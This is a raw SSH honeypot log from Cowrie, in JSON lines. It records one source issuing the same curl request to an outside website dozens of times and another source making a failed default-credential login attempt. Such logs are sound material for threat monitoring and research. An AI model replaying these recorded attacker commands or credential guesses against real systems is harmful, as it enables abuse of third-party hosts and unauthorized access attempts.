{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.581892Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.612199Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.612970Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.650600Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.651697Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.689998Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.690885Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.731183Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.732042Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"180.108.64.6","src_port":56292,"dst_ip":"1.2.3.4","dst_port":22,"session":"13c324506440","protocol":"ssh","message":"New connection: 180.108.64.6:56292 (1.2.3.4:22) [session: 13c324506440]","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.754705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.755739Z","src_ip":"180.108.64.6","session":"13c324506440"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.770250Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.770948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.855503Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.856319Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.895734Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.896649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.938361Z","src_ip":"180.108.64.6","session":"13c324506440"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.957717Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.958739Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.995459Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.996245Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.037293Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.038136Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.079228Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.080035Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.119964Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.120725Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.158859Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.159704Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.196366Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.197108Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.339772Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.340572Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.398368Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.399242Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.466569Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.467411Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.508594Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.509369Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.546539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.547311Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.585722Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.586432Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.623028Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.623758Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.660690Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.661508Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.699359Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.700191Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.708314Z","src_ip":"180.108.64.6","session":"13c324506440"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.824060Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.824978Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.867643Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.868497Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.915413Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.916343Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.958515Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.959422Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:19.996302Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:19.997061Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.035489Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.036335Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.086141Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.086941Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.134964Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.135793Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.195353Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.196189Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.233987Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.234804Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.271420Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.272197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.326417Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.327173Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.366926Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.367654Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.407175Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.408010Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.455871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.456734Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.494089Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.494893Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.562757Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.563642Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.608153Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.609092Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.655028Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.655818Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.701598Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.702377Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.741718Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.742638Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.782089Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.782922Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.831308Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.832256Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.892075Z","src_ip":"180.108.64.6","session":"13c324506440"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.909003Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.909774Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.946923Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.947664Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:20.987897Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:20.988692Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.027067Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.028060Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"180.108.64.6","src_port":54478,"dst_ip":"1.2.3.4","dst_port":22,"session":"b21a710ac6e5","protocol":"ssh","message":"New connection: 180.108.64.6:54478 (1.2.3.4:22) [session: b21a710ac6e5]","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.090077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.091031Z","src_ip":"180.108.64.6","session":"b21a710ac6e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.114862Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.115609Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.182820Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.183369Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.220922Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.221831Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-25